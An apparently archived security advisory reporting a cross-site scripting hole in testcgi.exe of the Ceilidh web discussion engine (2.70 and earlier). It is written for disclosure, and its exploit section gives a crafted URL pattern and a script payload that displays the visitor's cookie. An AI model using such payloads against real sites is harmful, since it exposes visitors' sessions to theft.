COMMAND

	Cross Site Scripting vulnerability in Ceilidh testcgi.exe

SYSTEMS AFFECTED

	Ceilidh 2.70 and prior [http://www.lilikoi.com]

PROBLEM

	Thanks    to    Gregory    Le    Bras     |     Security     Corporation
	[gregory.lebras@security-corporation.com], advisory [SCSA-013] :
	
	 http://www.security-corp.org/index.php?ink=4-15-1
	 http://www.security-corporation.com/index.php?id=advisories&a=013-FR
	
	
	DESCRIPTION
	________________________________________________________________________
	
	"Ceilidh  is  a  Web-based  threaded  discussion  engine  that  features
	automatic   text   to   HTML   conversion,   file   attachment,   e-mail
	notification, automatic message expiration, multiple levels of  security
	and much more."
	
	(direct quote from http://www.lilikoi.com)
	
	
	DETAILS & EXPLOITS
	________________________________________________________________________
	
	? Cross Site Scripting :
	
	A exploitable bug was found on Ceilidh which cause script  execution  on
	client's computer by following a crafted url.
	
	This kind of attack known as  "Cross-Site  Scripting  Vulnerability"  is
	present in testcgi.exe file, an attacker  can  input  specially  crafted
	links and/or other malicious scripts.
	
	- Exploits :
	
	http://[target]/cgi-bin/testcgi.exe?[hostile_code]
	
	The hostile code could be :
	
	[script]alert("Cookie="+document.cookie)[/script]
	
	(open a window with the cookie of the visitor.)
	
	(replace [] by <>)

SOLUTION

	None yet